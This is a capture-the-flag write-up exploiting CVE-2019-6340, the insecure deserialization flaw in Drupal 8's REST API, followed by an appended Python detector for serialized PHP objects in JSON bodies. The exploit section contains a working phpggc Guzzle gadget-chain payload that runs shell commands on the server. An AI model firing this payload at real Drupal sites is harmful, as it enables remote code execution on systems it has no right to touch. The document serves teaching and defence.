Not so Blind Rush: CVE-2019-6340

The CVE

In short, the remote code execution happens because the Drupal 8 REST API unserializes attacker-controlled data from the request body without validating it (insecure deserialization).

Insecure Deserialization

To understand insecure deserialization, first understand what serialization and deserialization are.

Source : https://portswigger.net/web-security/deserialization

Challenge Solution

By visiting the challenge URL we see a post made by the user optimusprime. A quick look at the favicon, however, suggests the site is running on Drupal.

Screenshot: blog post by Optimus Prime

nmap -p 80 -T4 -A host

Starting Nmap 7.80 ( https://nmap.org ) at DATE IST
Nmap scan report for host
Host is up (0.000058s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Unix))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.41 (Unix)
|_http-title: Home | Cybertron
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 0 hops
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.92 seconds
{
  "link": [
    {
      "value": "link",
      "options": "<SERIALIZED_CONTENT>"
    }
  ],
  "_links": {
    "type": {
      "href": "http://website.com/rest/type/shortcut/default"
    }
  }
}
phpggc guzzle/rce1 system id --json

O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}

When unserialize() is called on this value, the Guzzle gadget chain is triggered and the embedded command is executed.
Changing the command string from s:2:\"id\" to s:4:\"ls /\" (the length prefix must match the new string) lists the root directory instead.

Screenshot: contents of the / directory
flag{blindrush_s@m_witwicky_is_0ur_l@st_h0p3}
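From the defender's side, the tell-tale sign of this class of attack is a PHP-serialized object (the O:<len>:"Class": prefix, usually with NUL-separated private property names) arriving inside a JSON field that should only ever carry plain data. The following Python script is an added example, not part of the original write-up nor code from Drupal or phpggc: it walks a JSON request body, flags every string that embeds a serialized PHP object, and reports the class names found so that a WAF rule or a log-triage job can reject or alert on the request. The two request bodies and the `Example` class inside the suspect one are constructed sample data. Drupal's own fix for this issue shipped in 8.6.10 and 8.5.11 (SA-CORE-2019-003); the advisory's interim mitigation was to disable the web services modules or to block PUT, PATCH and POST requests to REST resources at the web server.

```python
"""Detect PHP-serialized objects hidden inside JSON request bodies.

Added example (not from the original write-up): walks every string in a
JSON document and flags values that look like PHP serialize() output for
objects, which is the shape of payload that CVE-2019-6340 relied on.
Meant for a WAF hook or access-log triage.
"""
import json
import re

# PHP serialize() emits objects as  O:<classname-length>:"<classname>":<n>:{...}
PHP_OBJECT_RE = re.compile(r'O:\d+:"([A-Za-z0-9_\\]+)":\d+:\{')


def iter_strings(node, path="$"):
    """Yield (json_path, value) for every string leaf in a parsed JSON tree."""
    if isinstance(node, str):
        yield path, node
    elif isinstance(node, dict):
        for key, value in node.items():
            yield from iter_strings(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from iter_strings(value, f"{path}[{index}]")


def find_php_objects(body: str):
    """Return a list of (json_path, class_names, has_private_props) for every
    string in the body that contains a serialized PHP object.

    Non-JSON bodies yield an empty list: this check is specific to JSON
    endpoints, and other content types belong to other rules.
    """
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    findings = []
    for path, value in iter_strings(doc):
        classes = PHP_OBJECT_RE.findall(value)
        if classes:
            # json.loads turns \u0000 into a real NUL; private/protected PHP
            # properties are named "\0Class\0prop", so a NUL is a strong signal.
            findings.append((path, classes, "\x00" in value))
    return findings


def should_reject(body: str) -> bool:
    """Policy decision: any serialized PHP object in a JSON body is rejected."""
    return bool(find_php_objects(body))


# Constructed sample bodies. The benign one carries an empty PHP array ("[]");
# the suspect one carries a harmless placeholder object with one private
# property, NOT the gadget chain from the write-up.
BENIGN_BODY = json.dumps({
    "link": [{"value": "link", "options": "[]"}],
    "_links": {"type": {"href": "http://website.com/rest/type/shortcut/default"}},
})
SUSPECT_BODY = json.dumps({
    "link": [{"value": "link",
              "options": 'O:7:"Example":1:{s:10:"\x00Example\x00p";s:1:"x";}'}],
    "_links": {"type": {"href": "http://website.com/rest/type/shortcut/default"}},
})


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("suspect", SUSPECT_BODY)):
        verdict = "REJECT" if should_reject(body) else "allow"
        print(f"{label}: {verdict}")
        for path, classes, private in find_php_objects(body):
            print(f"  {path}: classes={classes} private_props={private}")
```

The regex deliberately matches only the object form (`O:`), not serialized arrays (`a:`), because some legitimate Drupal field storage does hold serialized arrays; an object class name in user-supplied data is the part that has no legitimate reason to be there. Run against captured request bodies, the class names in the findings (for this CVE, Guzzle classes) tell the responder which gadget chain was attempted.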
